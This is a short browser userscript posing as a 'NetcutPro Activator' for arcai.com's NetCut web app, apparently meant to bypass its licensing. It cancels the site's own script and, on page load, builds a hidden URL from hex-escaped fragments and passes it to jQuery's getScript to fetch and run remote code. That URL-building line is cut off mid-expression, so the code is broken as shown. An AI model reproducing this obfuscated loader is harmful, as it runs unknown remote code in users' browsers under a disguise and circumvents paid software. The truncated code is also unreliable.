// ==UserScript==
// @name         netcut pro
// @namespace    http://tampermonkey.net/
// @version      1.0
// @description  NetcutPro Activator
// @author       who1d
// @match        https://www.arcai.com/netCut/s/
// @grant        GM_webRequest
// @webRequest   [{"selector":"https://www.arcai.com/netCut/s/main-*.js","action":"cancel"}]
// @require      http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
// ==UserScript==

(function() {
window.addEventListener("load", function(event) {

    var _cs=["\x68\x74\x74","\x6e\x65","\x6b\x6e","\x63\x73","\x75\x74","\x6d\x2f","\x2e\x6a\x73","\x2e\x63\x6f","\x65\x78\x6f","\x74\x63","\x2f\x2f","\x74\x69","\x70\x73\x3a"]; $.getScript( _cs[0]+_cs[12]
});
})();
